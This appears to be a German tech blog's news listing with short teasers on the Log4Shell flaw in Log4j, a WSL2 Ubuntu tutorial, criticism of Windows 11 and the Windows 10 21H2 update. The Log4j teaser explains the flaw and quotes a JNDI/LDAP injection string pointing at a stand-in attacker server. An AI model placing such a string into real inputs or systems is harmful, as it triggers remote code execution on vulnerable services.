Log4j und die Log4Shell-Lücke (14.12.2021)

Der Fehler liegt in der "Log4Shell" in der weit verbreiteten Java-Logging-Bibliothek "Log4j". Es lässt sich quasi beliebiger Code ausführen und das dazu noch sehr einfach. In der Java-Welt kommt diese Bibliothek häufig vor, um Prozesse zu protokollieren und etwaige Fehler zu finden. Das Problem dabei ist, dass "Log4Shell" nicht einfach nur schreibt, sondern darüber hinaus versucht den Protokolltext zu interpretieren. Enthält dieser z.B. die Zeichenfolge "${jndi:ldap://angreifer.server.de/a}", dann ist das Kind in den Brunnen gefallen, weil der Dienst den Server "angreifer.server.de" kontaktiert und von diesem ungefragt Java-Code entgegennimmt und ausführt. Weiterlesen...

Tutorial Windows Subsystem for Linux (08.12.2021)

Das neu veröffentlichte Tutorial beschreibt die Installation der Linux-Distribution "Ubuntu" (Version 20.04) unter dem "Windows Subsystem for Linux" (WSL in Version 2). Ferner wie man GUI-Linux-Anwendungen darunter installiert und direkt in Windows ausführen kann. Am Ende zeigen wir noch auf, wie man per Remotedesktopverbindung das Ubuntu-Desktop aufrufen kann, sprich das komplette System per GUI (Graphical User Interface), also graphisch, bedient. Kommentare bitte direkt auf der Tutorialseite (hier deaktiviert).

Was bei Windows 11 so richtig nervt (30.11.2021)

In diesem Beitrag wollen wir Ihnen aufzeigen, dass Windows 11 zum jetzigen Zeitpunkt noch in Kinderschuhen steckt und für produktives Arbeiten nicht gerüstet ist, sprich seinem Vorgänger Windows 10 aktuell in vielen Dingen nicht das Wasser reichen kann. Denn einiges wurde so sehr „verschlimmbessert“, um nicht zu sagen, dass diese Dinge einfach nicht durchdacht wurden und schlicht Mist sind. Wir betreiben Windows 11 Pro (21H2) auf einem Notebook mit Intel-Prozessor i7-1065G7 und 32 GB installiertem RAM. Gespeichert wird auf einer WD M2-NVMe SSD. Dabei haben wir das System per „clean install“ aufgesetzt und nicht von Windows 10 ein Upgrade auf 11 durchgeführt. D.h. alles sauber neu installiert, ohne evtl. Reste eines Vorgänger-Systems. Weiterlesen...

Windows 10 21H2 verfügbar (17.11.2021)

Das Funktionsupdate 21H2 zu Windows 10 ist fertig und wird aktuell von den Redmondern ausgerollt. Die Auslieferung erfolgt per Windows-Update an kompatible Maschinen, die Installation muss aber manuell angestossen werden. Weiterlesen...